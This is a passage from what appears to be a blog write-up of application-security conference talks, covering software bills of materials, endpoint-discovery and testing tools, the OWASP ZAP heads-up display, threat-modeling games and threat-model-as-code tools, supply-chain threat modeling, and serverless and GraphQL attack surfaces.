  • Vulnerability analysis (software and hardware)
  • Documenting direct, transitive, runtime, and environmental dependencies
  • File verification (via hash checking)
  • Hierarchical (system, sub-system, etc) representation of component usag
  • Tracking component pedigree (ancestors from which a component is derived from)

What does a BOM look like?

There are several older BOM formats, including Software Package Data Exchange (SPDX) and Software Identification (SWID): ISO/IEC 19770-2:2015. However, these did not fulfill Steve’s desired use cases so he created the CycloneDX) spec, which is lightweight and focuses on security.

CycloneDX uses a Package URL to uniquely identify a version of a dependency and its place within an ecosystem. It looks like this:

pkg:maven/org.jboss.resteasy/resteasy-jaxrs@3.1.0-Final?type=jar

The Package URL identifies all relevant compopnent metadata, including ecosystem (type), group (namespace), name, version, and key/value pair qualifiers.

One great aspect of this approach is that it’s ecosystem-agnostic: it can support dependencies on Maven, Docker, NPM, RPM, etc.

Java Maven Example Hardware Example
Examples of a CycloneDX BOM for a Maven Java dependency and hardware.

At 15:17, Steve does a demo of Dependency-Track, showing how it can be integrated into Jenkins and used to create a combined BOM for Java and NodeJS dependencies.

BOMs Away: Dependency-Track Features

Dependency-Track is Apache 2.0 licensed, source code is available on GitHub, has social media accounts on Twitter, Youtube, and Peerlyst, and see the following links for its documentation and homepage.

More than just third-party libs
One thing I found interesting, that I hadn’t thought of before, is that you can capture a number of aspects of piece of software in a BOM, beyond just third-party dependencies; for example, the app’s environment, runtime, and hardware dependencies.

Endpoint Finder: A static analysis tool to find web endpoints

Olivier Arteau, Desjardins
abstract slides video source code

After presenting about his new bug class, Prototype pollution attacks in NodeJS applications at NorthSec 2018 (which by the way made it into Portswigger’s Top 10 Web Hacking Techniques of 2018), Olivier needed a better way to analyze JavaScript code at scale.

Existing tools were either dead, regex-based, or didn’t support the analysis capabilities he wanted, so he built and open sourced endpointfinder, which parses JavaScript code into Abstract Syntax Trees (ASTs) to determine the routes that are defined (e.g. $.get() or open() calls on an object of type XMLHttpRequest). These results can by automatically imported via an accompanying Burp or Zap plugin.

Endpoint Finder: Scope
Endpoint Finder: Scope

I’m a big fan of the power of AST matching over regex (after all, I gave a talk at ShellCon 2019 about it), so I’m glad this work was done.

That said, I feel like Olivier’s use of the term “symbolic” is a bit misleading (to me, it hints at symbolic execution, which this is not), and I think his use of the term “call graph” is a bit different than what’s agreed upon in the program analysis community.

I like yhis talk, but I think the terminology and approach taken (e.g. when reasoning about variable values and function calls) would benefit from doing a bit of literature survey.

See the summary for The White Hat’s Advantage: Open-source OWASP tools to aid in penetration testing coverage for a discussion of OWASP Attack Surface Detector, which also uses static analysis to find routes for web frameworks in Java (JSPs, Servelets, Structs, Spring MVC), C# (ASP.net MVC, Web Forms), Rails, and Django.

Pose a Threat: How Perceptual Analysis Helps Bug Hunters

Rob Ragan, Partner, Bishop Fox
Oscar Salazar, Managing Security Associate, Bishop Fox
summary abstract slides video

The speakers describe how to make external network penetration tests more effective by auto-screenshotting exposed websites and then clustering them based on visual similarity.

At a high level, their approach is:

  1. OSINT (OWASP AMASS) is used to find target domains and subdomains.
  2. Threat intel, wordlists, and other sources are used to find interesting paths to check.
  3. AWS Lambdas are spun up that use headless Chrome to screenshot these paths.
  4. Shrunk screenshots are stored in S3, response bodies and headers are stored in Elasticsearch. Screenshots are grouped by similarity using fuzzy hashing.
  5. Humans review sorted screenshots for leaked sensitive data or promising targets to attack.

They scanned every web app on AWS Elastic Beanstalk and found many credentials, API keys and over 9GB of source code.

Elastic Beanstalk Loot

Read the full summary here.

The White Hat’s Advantage: Open-source OWASP tools to aid in penetration testing coverage

Vincent Hopson, Field Applications Engineer, CodeDx
abstract slides video

Vincent describes how two OWASP tools, Attack Surface Detector and Code Pulse, can make penetration testers more effective and demos using them.

These tools leverage the advantage that white hat penetration testers have over external attackers: they have access to server binaries/bytecode and the server-side source code.

White Hat Advantage: Typical Penetration Testing Workflow
A key part of assessing an application is determing its functionality and exposed endpoints.

Attack Surface Detector

Attack Surface Detector (ASD) performs static analysis on a web application’s source code to determine the endpoints it defines, including the paths, their expected HTTP verbs, and the names and types of parameters. It supports several languages and frameworks:

  • Java - JSPs, Servlets, Struts, Spring MVC
  • C# - ASP.NET MVC, Web Forms
  • Ruby - Rails
  • Python - Django

The value of ASD is in enabling testing, whether manual or automated, to be faster with better coverage.

  • When doing manual black box testing, it’s easy to miss endpoints if you’re time constrained. Also, there may be a legacy, insecure endpoint that is no longer used by the application but is still present and accessible if you know it’s there.
  • Getting high application functionality coverage is always a challenge for web app scanning tools (DAST), so by feeding in a set of known routes, better coverage can be achieved.

ASD has a plugin for both ZAP and Burp Suite, enabling easy ingestion of routes in JSON format.

White Hat Advantage: A screenshot of ASD
A screenshot of ASD within ZAP

See the summary for Endpoint Finder: A static analysis tool to find web endpoints for Olivier Arteau’s take on extracting routes from JavaScript code using their AST.

How Does It Actually Work?
Static analysis is a personal interest of mine, so I spent just a few minutes trying to determine how the routes are actually extracted. According to the attack-surface-detector-cli README, it uses ASTAM Correlator’s threadfix-ham module to determine the endpoints.

Some brief spelunking of ASTAM Correlator uncovers how they’re determining Rails routes - a custom lexer written in Java 😆. Here’s a snippet from RailsAbstractRoutesLexer.java (comments mine):

@Override
public void processToken(int type, int lineNumber, String stringValue) {
    
    if (type == '{') numOpenBrace++; // oh no
    if (type == '}') numOpenBrace--;
    if (type == '(') numOpenParen++;
    if (type == ')') numOpenParen--; // y u do this 2 me
    if (type == '[') numOpenBracket++;
    if (type == ']') numOpenBracket--;

    if (type == '#') {              // make it stahp
        isInComment = true;
    }
    // ...

I think lightweight static analysis on web apps is an interesting and useful direction to investigate, and I’m always a fan of people building more useful static analysis tools, but as I mentioned in my 2019 ShellCon presentation, you almost always don’t want to build your own lexer or parser. Languages are incredibly complex, have countless edge cases, and evolve over time. Instead, you want to leverage an existing parser for the language (like whitequark/parser) or a parser that can handle multiple languages, like GitHub’s semantic.

I would also argue that dynamic analysis is a better fit for extracting web app routes, due to how loops and other dynamic constructs can programmatically generate routes, but that’s a grump for another time…

Code Pulse

Alright, let’s take a look at Code Pulse, the second tool described and demo’d in this talk. Code Pulse is an interactive application security testing (IAST) tool (vendor description), which basically means that it hooks into an application’s runtime / instruments the bytecode to give you live, continuous understanding of the code paths that are being executed. Code Pulse currently supports Java and .NET applications.

This has a number of benefits, including:

  • App owner / security tester: which parts of the application are actually being exercised?
  • Security tester: Has my input reached a potentially vulnerable code location? In theory, an IAST can tell you this even if your specific input would not have exploited the issue.
  • Which tools or testers are getting the best coverage?

By having better insight into the running application, testing can again hopefully be faster and more effective.

White Hat Advantage: A screenshot of Code Pulse
A screenshot of Code Pulse. Different JARs, classes, and JSPs are represented by different blocks

Demo

The demo starts at 26:28, where Vincent shows how Attack Surface Detector can be used to extract the routes from WebGoat. These routes can then be imported into ZAP, causing its spidering to be more effective.

At 36:27 starts demoing Code Pulse by uploading the .war file for JPetStore, an open source Java Spring app. Code Pulse generates an inventory for all the contained code, running Dependency-Check to look for out of date dependencies, Attack Surface Detector to extract endpoints, and instruments the web app’s bytecode to give you visibility into what code is running as you test.

Vincent shows how you can “start recording” in Code Pulse, log in to the application as one user and perform some actions, then record a new sessions with a different user. Code Pulse allows you to then easily visualize which code blocks were exercises by both sessions, as well as the code unique to one user.

Access Control Bug Heaven
This seems really useful for testing for access control bugs. I’d also recommend my friend Justin Moore’s Burp extension, AutoRepeater, which imho is the most powerful/flexible access control-related Burp extension.

Usable Security Tooling - Creating Accessible Security Testing with ZAP

David Scrobonia, Security Engineer, Segment
abstract slides video

In this talk, David gives an overview and demo of ZAP’s new heads-up display (HUD), an intuitive and awesome way to view OWASP ZAP info and use ZAP functionality from within your browser on the page you’re testing.

The Hero Security UX Needs

Security tools aren’t exactly known for having clean UIs or being intuitive to use. David took this as a personal challenge and ended building a heads-up display (HUD) for OWASP ZAP, an intercepting proxy security testing tool.

The HUD allows you to view info from ZAP and use ZAP functionality from on the page you’re testing itself, without having to switch to a separate window or tool.

What’s an Intercepting Proxy?

An intercepting proxy is a tool commonly used by pen testers or security engineers to test web or mobile applications. The proxy sits between your browser and the web server you’re testing, allowing you to inspect, edit, and replay any HTTP request sent between your browser or device and the server.

ZAP HUD: Proxy Overview
The proxy (ZAP) sits between your browser and the web server
ZAP HUD: Proxy Overview
Typical security testing usage: browser on one side of your screen, proxy on the other

ZAP is an OWASP flagship project, is free and open source, and has been downloaded directly ~625,000 times and has had ~1M Docker image pulls.

ZAP User Stats

David presented some ZAP user stats I found interesting: ~40% of users have been security for under 1 year and ~68% have been in security under 3 years, and 45% of users are QA or developers.

ZAP HUD: ZAP User Roles
ZAP HUD: ZAP User Roles

The Heads-up Display (HUD)

Taking inspiration from fighter jets, David decided to build a way for ZAP users to view the most relevant ZAP info in a concise way on the page that they’re testing.

At 7:52 David starts to do a live demo, but apparently there were insufficient sacrifices to the demo gods, so he falls back to several recorded demos at 10:44.

Features: The ZAP HUD allows you to easily view ZAP findings from within the browser (alert notifications pop up as issues are discovered and there are icons you can click to view all findings of a given severity), and you can perform actions like spidering the site, adding or removing the current page from scope, and starting an active scan by similarly clicking on an icon within your browser.

Other cool features include:

  • You can enable an option to auto-show and enable all hidden fields for every form, making it immediately evident what info the website is expecting and making it easy to supply arbitrary values.
  • If you don’t want to active scan an entire site, you can enable “attack mode” and ZAP will scan just the pages and endpoints you’re currently manually testing.

The ZAP HUD is also highly extensible, which is probably one of the most exciting and powerful parts of this. At 16:17 David shows a demo video of how you can customize the HUD to display whatever info you want, and add buttons to perform arbitrary actions.

Implementation Details

Rather than implementing the HUD via a browser extension, which may not be portable across browsers, the HUD instead works by having ZAP injecting an additional JavaScript flie include into loaded pages, which references a script hosted by ZAP that implements the HUD.

The HUD logic is encapsulated in a JavaScript closure so the page can’t modify it, and then the script modifies the page to add several iframes, corresponding to each of the Actions in the HUD on the right and left hand side of your browser window. Service workers are used to keep the HUD responsive when you’re intercepting requests and otherwise performing actions that would cause normal JavaScript on the page from dying or reloading.

ZAP HUD: ZAP User Roles

Who Can Use the HUD and Why

Developers can use the HUD to get early feedback on if their code has security bugs as they develop. It can enable them to see their app as an attacker would and provides hassle free browser integration.

Bug Bounty Hunters can use it to simplify their process, for example, by adding in new HUD tools for recon (e.g. BuiltWith, Wappalyzer, amass) and displaying notifications there are changes to cookies, parameters, local storage (giving visibility into what the app is doing). ZAP let’s you configure how to log in as different users, so you could add a HUD tool to quickly switch between test users, making testing for access control issues much easier.

QA engineers can benefit from how it highlights attack surface (hidden fields, forms), enables easy fuzzing and attacking forms within the browser, without having to use external tools, and in the future there could even by a Jira plugin for quick reporting, that with the click of a button would create a Jira ticket with all of the relevant testing info autopopulated.

The Security Team could similarly benefit from a Jira plugin, and they could also define custom rules for an app (set various policy configs that all testers automatically pull in during testing) and configure global scan rules for your organization (e.g. perhaps there are certain issues you don’t care about, or there are org-specific issues you want to ensure are always tested).

References

David wrote an excellent, detailed blog post about the HUD (Hacking with a Heads Up Display) which includes links to a number of demo videos. He also presented about the ZAP Hud at AppSec USA 2018 (video).

David also referenced segmentio/netsec, a library that Segment open sourced that provides a decorator for the typical dial functions used to establish network connections, which can be configured to whitelist or blacklist certain IP network ranges. For example:

import (
    "net/http"
    "github.com/segmentio/netsec"
)

func init() {
    t := http.DefaultTransport.(*http.Transport)
    // Modifies the dial function used by the default http transport to deny
    // requests that would reach private IP addresses.
    t.DialContext = netsec.RestrictedDial(t.DialContext,
        netsec.Blacklist(netsec.PrivateIPNetworks),
    )
}



Threat Modeling

Game On! Adding Privacy to Threat Modeling

Adam Shostack, President, Shostack & Associates
Mark Vinkovits, Manager, AppSec, LogMeIn
abstract slides video

Adam Shostack and Mark Vinkovits describe the Elevation of Privilege card game, built to make learning and doing threat modelling fun, and how it’s been extended to include privacy.

Elevation of Privilege: Background

Adam originally created Elevation of Privilege at Microsoft as a fun and low barrier to entry way to teach threat modeling to junior security engineers and developers. While he’s proud of his book on threat modeling, it’s 600 pages, so not exactly something you hand someone who is just learning.

Adam was inspired by Laurie William’s Protection Poker game, which is an example of increasingly popular “serious game” movement (Wikipedia), which are games designed for a primary purpose other than entertainment, used in industries like defense, education, scientific exploration, health care, emergency management, city planning, engineering, and politics.

Elevation of Privilege: Why a Game?

Games are powerful because:

  • They encourage flow: they can be challenging but not too hard that they cause anxiety.
  • They require participation: at some point it’s going to be your turn and you have to play, so you need to pay attention, but it passes focus in a way that isn’t aggressive or demanding.
  • They provide social permission for playful exploration and disagreement.
    • Games give us permission to act differently than we normally would in a meeting. Normally a junior security engineer might feel uncomfortable asking a senior developer if a given component might be insecure- “Well, this is just a game, so let’s hypothetically think about what it would mean if this was the case.”
    • This similarly makes disagreements less confrontational; instead they can be collaborative and playful.
  • They can be fun, which makes it much easier to get developers, QA, and others involved and invested.

Further, Elevation of Privilege produces real threat models, it’s not just a training game you play once and you’re done.

LogMeIn has adopted Elevation of Privilege for all threat modelling sessions for the past 2 years and pretty much every time it’s used it calls out at least 2 - 3 high impact issues that were not previously discovered or called out beforehand. Mark gives an example of an issue it successfully drew out in a piece of a code written by several experienced, principal-level developers.

Serious games are important for security. -Adam Shostack

Elevation of Privilege: How to Play

  1. Draw a picture of the new feature or system being discussed.
  2. Deal out all the cards.
  3. Play hands (once around the table), connecting the threats on a card to the diagram. Cards should stay in the current suit.
  4. Play through the deck or until you run out of time.
  5. The person appointed to take notes should document all potential issues discussed and create the relevant Jira tickets, discuss items with product managers to determine business relevance and impact, or whatever makes sense for the company and team.

Elevation of Privilege is inspired by the Spades, in that you’re supposed to follow suit, higher numbers win, and trumps when over other cards.

Aces are for threats not listed on the cards, that is, you’ve invented a threat not in the deck.

You get 1 point for each threat and 1 point for winning the hand.

Game On: Elevation of Privilege Tampering example
Cards are played on the parts of the diagram that it may apply to (Click to enlarge)

The card suits are from STRIDE, which is a mnemonic for Spoofing, Tampering, Repudiation, Info Disclosure, Denial of Service, and Elevation of Privilege.

An important thing to note is that the cards have been carefully written, through extensive user testing, to hint at what can go wrong in a way that’s accessible and intuitive to non-security professionals.

The Privacy Extension 

Extending Elevation of Privilege to include privacy followed the same process building any usable system should follow:

  1. Understand your users, the people you’re building for
  2. Understand their use cases
  3. Rapid prototype a solution - before putting months into it, sketch it out on piece of paper
  4. Evaluation your solution based on user feedback and iterate.

Mark emphasized how critical it is to involve the end users as early as possible in the process. Otherwise, you’ll waste significant time building things they won’t want to use. This process is called user-centered design, user experience (UX), iterative design, etc.

Extensive User Testing
In creating the Elevation of Privilege, Adam did a ton of usability studies on the hints, prototyped half a dozen different approaches, and watched how diferent people reacted to them. He spent a significant amount of time watching people struggle with what he had created so far, and noted the problems they had.

Mark took a number of the Jira issues resulting from some GDPR work they had already done at LogMeIn, abstracted the ideas, and the compiled a list of privacy-related topics that should be discussed during sprint planning.

He ended up building the privacy discussions into Elevation of Privilege itself by adding an additional “Privacy” suit. Here are a few examples:

Your system is not able to properly handle withdrawal of consent or objection to processing.

Your system is not following through on personal data deletion in integrated 3rd parties.

Personal data in your system is missing pointers to data subjects, hence the data is forgotten when the owner is deleted or makes a request for access.

OH HAI! Another Privacy Extension

After they’d already submitted this talk, they learned that several people from F-Secure had been working on anothe privacy extension of Elevation of Privelege, which is also open source on GitHub.

Their version extends the STRIDE model with TRIM:

  • Transport of personal data across geopolitical or contractual boundaries
  • Retention and Removal of personal data
  • Inference of personal data from other personal data, for example, through correlation
  • Minimisation of personal data and its use

References

You can get the Elevation of Privilege card deck for free (print it yourself) or have Agile Stationery put it on some nice sturdy cards for you. You can also see a transcript of this talk on Agile Stationery here.

Both the original and the privacy extension are freely available and licensed under Creative Commons. Get the original here, Mark’s privacy version here, and the F-Secure privacy version here.

Questions

Q: I love this idea, but how do I get people to agree to play a game in a meeting?

Adam generally asked people, “Give me 15 minutes of your time where you suspend your sense of disbelief. We’ll play a bit, and then after 15 minutes, we’ll decide if it’s not working.” He gives many trainings, and has always found it to work.

As the AppSec person, do you act as moderator or do you participate as well?

Adam generally tries to read the room: do I have people who need some coaching and help, or do I have people who will be engaged by the competition and try to beat the game’s creator? He’ll then adjust his style to be collaborative or cutthroat as appropriate. He prefers to be collaborative, get people engaged, and he’ll just act as a coach.

Mark has found that when he doesn’t deal cards to himself, it conveys to the developers that this isn’t just going to be some AppSec person telling them what to do, it’s going to be a process where they take ownership, be self-directed, and find out for themselves what they need to do.

Offensive Threat Models Against the Supply Chain

Tony UcedaVelez, CEO, VerSprite
abstract slides video

In this talk, Tony discusses the economic and geopolitical impacts of supply chain attacks, a walkthrough of supply chain threat modeling from a manufacturer’s perspective, and tips and best practices in threat modeling your supply chain.

Tony is the author of Risk Centric Threat Modeling: Process for Attack Simulation and Threat Analysis, Wiley, 2015.

A Holistic View of Threat Modeling Supply Chains
To me, the most unique and valuable aspect of this talk is its holistic view of threat modeling a company and ecosystem.

This includes all of the potential threat actors and their motivations, the geopolitical risks that may be involved, physical and network risks as well as software risks, leveraging threat intel (what types of attacks are other companies in my industry facing?), other breaches (if I’m a provider for a government agency and there was a breach of another government agency or provider, how does that leaked info, PII, and IP affect my company and my customers?), CVEs in your products and your dependencies, and more.

Supply Chain Threat Model - Overview
In this talk, Tony focuses on manufacturing: companies who assemble products using components from various sources. (Click to enlarge)

2017 saw a dramatic rise in supply chain attacks, a 200% increase over previous years. Typical attacks costs a business $1.1 million.

General Motives and Probabilistic Analysis

When you’re constructing a threat model, it’s important to consider the threat motives of the attacker: their intent, the reward they’ll get from a successful attack, and if they can repudiate the attack.

You can then do a probabilistic analysis based on the access required to do the attack, the risk aversion of the attacker, and their capabilities.

Impact Considerations

The impact of a supply chain attack can include:

  • Financial loss - lost sales, charges run up by criminals using enterprise resources billed to the company, increased insurance premiums, fines/penalties for unreported breaches, costs of upgrading security, etc.
  • Time loss - Businesses estimate it takes over 60 hours to respond to a software supply chain attack.
  • Cargo loss - oftentimes 3-5 times the value of the cargo, all told, because of opportunity cost of replacement, disruption to schedules, etc.
  • Associated losses (corporate) - Loss of customer trust/reputational harm Loss of market share/market cap.
  • National security - Threats when the targets are strategic assets (mail service, power grids, trains/roads).
  • Human life / societal loss - Could result in deaths if people can’t reach 911 or other vital resources can’t be dispatched to emergencies.

Clarifying Expectations
It’s important to clarify points of view and priorities with your stakeholders, the people who are sponsoring the threat modeling. This helps you communicate your results at the end of it in language and terms that are meaningful to them.

Supply Chain Threat Library & Motives​

A “threat library” consists of threats to a business, including: disruption​, framing a person or company, sabotage​, extortion​, espionage​, data exfiltration, stealing Intellectual Property​, acessing sensitive data​.

An attacker’s “threat motives” can include: lulz, practicing for another target​, misdirection (blame an adversary​), reduce target’s credibility, revenge, financial, obtain intel​, leverage data for its value​, shorten product development cycles, leverage PII for impersonation, and OSINT​.

Supply Chain Threat Model - Risk Graph
Note that due to the interrelated nature of supply chains and society, supply chain attacks can result in socioeconomic instability (e.g. attacking food production, payment systems, etc.)

Also, if you can interrupt supply of a good or service, you can affect pricing through a supply chain hack, so there are certainly incentives for orchestrated attacks. (Click to enlarge)

How to Threat Model Your Supply Chain

  1. Look at risks with for your company that have high likelihood, based on your company and industry (what attacks has your and similar companies faced?).
  2. Determine which parts of your attack surface are relevant to the threat(s).
  3. Identify vulnerabilities/weaknesses that live within this attack surface.
  4. Build a threat library based upon attackers’ likely motives.
  5. Build an attack library that realizes the motives in your threat library.
  6. Determine the success of these attack patterns via security research or manual pen testing.

Threat Modelling USPS

Tony walks through threat modelling the U.S. Postal Service (USPS), including several of the large sorting devices they use. See slides 13 - 18 for more details.

Supply Chain Threat Model - USPS

You can’t cover every attack, focus on the ones that are most likely based on evidence and data.

Supply Chain Threat Model - Attack Tree
Tony believes attack trees are more useful than data flow diagrams (DFDs) for threat modeling, as they make potential attack paths concrete.

Given these attack trees, you can then do a probabilistic analysis of the viability of each path. For example, if many of the vulns relate to denial-of-service, and the attacker’s goal is to cost the company money, then these paths could enable an attacker to realize that goal.

The Danger of Testimonials
One clever OSINT vector Tony points out is testimonials, the brief blurbs busineses have on their sites in which customers promote a product.

If you have developed exploits for a given hardware or software provider, you can use testimonials to determine who uses the vulnerable product. If you’re targeting a specific company, you can review the websites of product companies who tend to serve the target’s vertical to see which vendors and potentially even the specific products the target company uses.

Job postings can similarly reveal the technologies and products a company uses.

Supply Chain Threat Model - Automation
Examining the trust boundaries between layers, components, and supply chain providers. Getting in to the control level is great for repudiation. (Click to enlarge)

Probability = event / outcome

What events have actually occurred in the threat model you’re building, and what were their outcomes?

Attack Surface as a Service

Similar to aggregating compromised PII into a marketplace, there are already marketplaces for companies’ vulnerabilities and attack surfaces - the people they employ and their roles, the software the company uses, their domains/IPs/etc. Government groups and private hacker syndicates for hire are the most mature in this area.

Supply Chain Threat Model - Overalll Process
The overall process from end to end (Click to enlarge)

Threat Model Every Story: Practical Continuous Threat Modeling Work for Your Team

Izar Tarandach, Lead Product Security Architect, Autodesk
abstract slides video

Izar describes the attributes required by threat modelling approaches in order to succeed in Agile dev environments, how to build an organization that continuously threat models new stories, how to educate devs and raise security awareness, and PyTM, a tool that lets you express TMs via Python code and output data flow diagrams, sequence diagras, and reports.

Threat Modeling Goals

According to Izar, threat modelling is:

A conceptual exercise that aims to identify security-related flaws in the design of a system and identify modifications or activities that will mitigate those flaws.

In traditional waterfall development processes, there could be a large upfront threat modellinng session performed upfront during the design phase, which would accurately model the system to be built. With Agile, this approach is no longer effective.

Izar determined the following goals he needed from a TM approach for it to be effective at Autodesk:

  • Accessible: can a product team do it independently after a brief period of instruction? Can they keep doing it?
  • Scalable: can the same thing be done over many teams and products? In a short time?
  • Educational: can it teach instead of correct?
  • Useful: are the results found useful for both product and security?
  • Agile: is it repeatable, does it negatively impact the product team’s velocity?
  • Representative: how does the system being modeled compare with the model?
  • Unconstrained: once the “known suspects” are evaluated, is the team led to explore further?

Existing Approaches Didn’t Cut It

Izar ranked several current approaches against these goal criteria and found they were all lacking in some respect, ranging from not being scalable (requiring SMEs), being too heavy-weight, overly constraining the process (discouraged participants from imagining other threats), and more.

TM Every Story: Comparing Approaches

Continuous TMing: How to Threat Model Every Story

  1. Build a baseline, involving everyone.
    • Use whatever technique works for your team, it doesn’t have to be perfect.
  2. Designate one or more “threat model curators,” who will be responsible for maintaining the canonical threat model document and the findings queue.
    • These people don’t have to tech leads, they just need to mind the queue and make sure issues get the appropriate attention.
  3. Have devs evaluate every story: “Does this have any security relevance?”
    • If not, continue as usual. If it does, either address the issue and document it as a mitigated finding, or add it as a “threat model candidate finding” for the curator to review.
    • At Autodesk, they track these via labels on Jira tickets.
  4. Make sure your curators are on top of the TM finding and candidate finding queues.

How do Devs Know What has Security Relevance?

Here Izar takes inspiration from Richard Feynman, who said to teach principles, not formulas.

Do your own homework. To truly use first principles, don’t rely on experts or previous work. Approach new problems with the mindset of a novice. Truly understand the fundamental data, assumptions and reasoning yourself. Be curious. -Richard Feynman

So they created a Continuous Threat Modeling Handbook that lists the functional areas security will generally care about (e.g. authentication, authorization, crypto, etc.) as well as a Secure Developer Checklist - Continuous Threat Modeling that can be used by devs to verify that the principles have been followed at implementation time.

TM Every Story: Sample Questions
Example topics that are security-relevant

We are training our developers wrong. We are providing huge amounts of information that do not correspond to huge amounts of useability. We are doing the busywork of teaching people how the RSA algorithm works without focusing on the aspects of choosing the right key length, algorithm and secret protection scheme that their system needs.

Principles Checklist

Autodesk’s principles checklist follows a “if this then that” model - devs only need to review the items relevant to what they’re currently working on.

TM Every Story: Checklist
Example items from the checklist

Importantly, all of the description used is written in terms devs understand, rather than security jargon, so they can easily determine if an item is relevant.

The checklist is small, ideally no more than one double sided printed page so it can be printed and kept at hand.

The “then that” side is not prescriptive. It pushes the developer to search for info relevant to the environment or framework they’re using. This is done on purpose to: keep the list short, make it somewhat open-ended, and to tickle most dev’s innate curiosity. The checklist gives pointers but not “absolute solutions.”

The checklist is backed by further documentation and live support by the security team.

Limitations

Izar has found that a primary challenge is convincing dev teams that the Subject List is not a threat library and that the Checklist is not a requirements list: these are starting points, not an exhaustive list.

Following this process won’t yield perfect TMs, and that’s ok - it’s a process that evolves over time. As long as the TM is better than it was before, that’s valuable progress.

An SME or security team is still necessary for education, and with anything, the resulting TM is only as good as the quality of the data informing it.

Current TM Approaches

Some tools start with a questionnaire (“What do you want to build?”) and generate a list of requirements that the developers must follow. Others get a description of the system and generate threats based on characteristics of the design.

But developers write code, why not let them define a threat model in code?

3 “Threat Model as Code” Approaches

ThreatSpec by Fraser Scott is threat modeling IN code: as code is written, the threat model is described in comments inline with the code. For example:

// @accepts arbitrary file writes to WebApp:FileSystem with
//   filename restrictions
// @mitigates WebApp:FileSystem against unauthorised access 
//   with strict file permissions
func (p *Page) save() error {
    filename := p.Title + ".txt"
    return ioutil.WriteFile(filename, p.Body, 0600)
}

ThreatPlaybook by Abhay Bhargav is threat modeling FROM code: deriving previously identified threats from other tools, validating or discovering those threats present in code, and providing a proper language to talk about these threats. You build a library of threats, run your tools, and marry findings with the threats you built before. Abhay discussed ThreatPlaybook in his AppSec Cali 2018 talk Robots with Pentest Recipes.

Here’s a video demo of running ThreatPlaybook, and an example repo. Abuse cases are listed in YAML, for example:

login_user:
  description: |
    As an employee of the organization,
    I would like to login to the Customer API and manage Customer Information
  abuse_cases:
    external_attacker_account_takeover:
      description: As an external attacker, I would compromise a single/multiple user accounts to gain access to sensitive customer information
      threat_scenarios:
        sql injection user account access:
          description: External Attacker may be able to gain access to user accounts by successfully performing SQL Injection Attacks against some of the unauthenticated API Endpoints in the application
          severity: 3
          cwe: 89
          cases:
            - sql_injection_auto
            - generic_error_messages
            - database_hardening_check

PyTM by Izar and a few friends, is threat modeling WITH code; using code to express the system to be modeled.

PyTM – Creating a Threat Model

In PyTM, you create a threat model in Python code, describing the relevant boundaries, actors, and servers using Python objects.

from pytm.pytm import TM, Server, Datastore, Dataflow, 
  Boundary, Actor, Lambda

tm = TM("my test tm")
tm.description = "another test tm"

User_Web = Boundary("User/Web")
Web_DB = Boundary("Web/DB")
VPC = Boundary("AWS VPC")

user = Actor("User")
user.inBoundary = User_Web

web = Server("Web Server")
web.OS = "CloudOS"
web.isHardened = True

my_lambda = Lambda("cleanDBevery6hours")
my_lambda.hasAccessControl = True
my_lambda.inBoundary = Web_DB

tm.process()

Once the threat model has been defined, PyTM can be used to generate data flow diagrams, sequence diagrams, or a report.

PyTM – how is it being used?

Currently Autodesk is using PyTM during team meetings to create an initial TM diagram.

It facillitates discussions and rapid iteration with product teams, as you can easily review the generated diagrams: “is it missing this attribute?”, “why is this a threat?”, “what if… ?”

PyTM allows you to keep threat models in version control, together with the code it describes, and you can generate automated, standard threat model reports.

Is keeping these TM files up to date feasible?
I love all of these properties, but you still have the fundamental challenge of keeping these TM files up to date with the architecture and current feature set of the code, which seems like it’d be a burden on dev teams or at least hard to maintain at scale. I’d be curious to hear Izar’s thoughts on the successes and challenges of this approach after a year or two.



Web Security

An Attacker’s View of Serverless and GraphQL Apps

Abhay Bhargav, CTO, we45
abstract slides video source code

An overview of functions-as-a-service (FaaS) and GraphQL, relevant security considerations and attacks, and a number of demos.

What is Functions-as-a-Service (FaaS)?

FaaS enables developers to write standalone, single purpose functions that are triggered by events (e.g. HTTP requests, an upload to S3, text message to your messaging gateway). When the function runs, a container/VM executes the task and then freezes post execution and gets killed.

Serverless is a natural extension of the progression from monolith applications, to microservices, to simply single purpose functions, the smallest individual unit of compute.

FaaS are short lived, they have no ports (you’re accessing them through an API gateway, the function is not handling the network communication itself), and have no state.

The FaaS lifecycle is:

  • Containers/MicroVMs are “thawed” when they are invoked again
  • Additional containers are spawned to scale based on concurrent invocations
  • Function is invoked launching a container to run and are destroyed after.

Note: some serverless deployment managers may give your function more permissions than it needs.

What is GraphQL?

GraphQL is an API query language that enables the client to query and mutate exactly what is wanted; for example, multiple resources or only certain attributes of one resource can be read or modified in a single request.

Usually there’s only a single endpoint to query and insert (mutate) data for the API, and GraphQL implementations support pubsub functionality for realtime data. Example NodeJS Express GraphQL server:

const app = express();
const PORT = 3000;
app.use('/graphql', graphlHTTP({
    schema: schema,
    graphiql: true,
}));
GraphQL Overview GraphQL Architecture
Click to enlarge

GraphQL Terminology

  • Schemas and Types: You can define object types (e.g. User) with fields (first_name, age) and their types (String, integer).
  • Queries => Select Statements
  • Mutations => Insert/Update Statements
  • Scalar => Custom Data Types
  • Resolver => Function that translates the type system to DB queries
Attacker's View of Serverless and GraphQL: Overview Diagram

FaaS Security Considerations

No Frameworks
Functions generally don’t use standard, battle-tested web frameworks like Django or Rails. Instead, devs are writing endpoints that don’t have all of the useful built-in security features, so they have to roll their own input validation code, implement access controls and logging per function, and overall have to ensure they protect against standard OWASP-style web app attacks like XSS, CSRF, SQL injection, etc.

No Network Attack Surface 👍

Observability/Debugging is a challenge
Monitoring functions for attacks and security-related logging is challenging unless you specifically architected for them.

Events from Multiple Sources
Functions can be triggered from events like S3, SNS, SQS, etc., which presents a larger attack surface than just web requests. Traditional security controls such as WAFs and others may be ineffective, as functions may be triggered by events instead of just HTTP requests. DAST tools tend to have trouble scanning functions, as they’re short-lived and generally can’t be crawled like standard web apps.

Attacker’s View of FaaS

Routes to FaaS Pwnage!

Abhay outlines three primary FaaS attack vectors, only the first of which is unique to FaaS:

  1. Attacking functions (and cloud provider) through non-API Gateway Events
    • As mentioned previously, initiating events, such as an S3 upload, that trigger a function enable you to attack functions out of band.
  2. Attacking functions (and cloud provider) through its API - standard web service attacks
  3. Denial of Service

Function Data Event Injection

Abhay defines event injection as an injection attack that’s triggered through third-party event notifications, for example, a file being uploaded to S3, a message sent over a notification service, a message received on a queue, DynamoDB stream events, etc.

The data in these events can cause standard injection bugs, such as insecure deserialization, XXE, (No)SQL injection, SSRF, and template injection.

Attacker's View of Serverless and GraphQL: Function Data Injection
An example function data event injection attack
Challenges

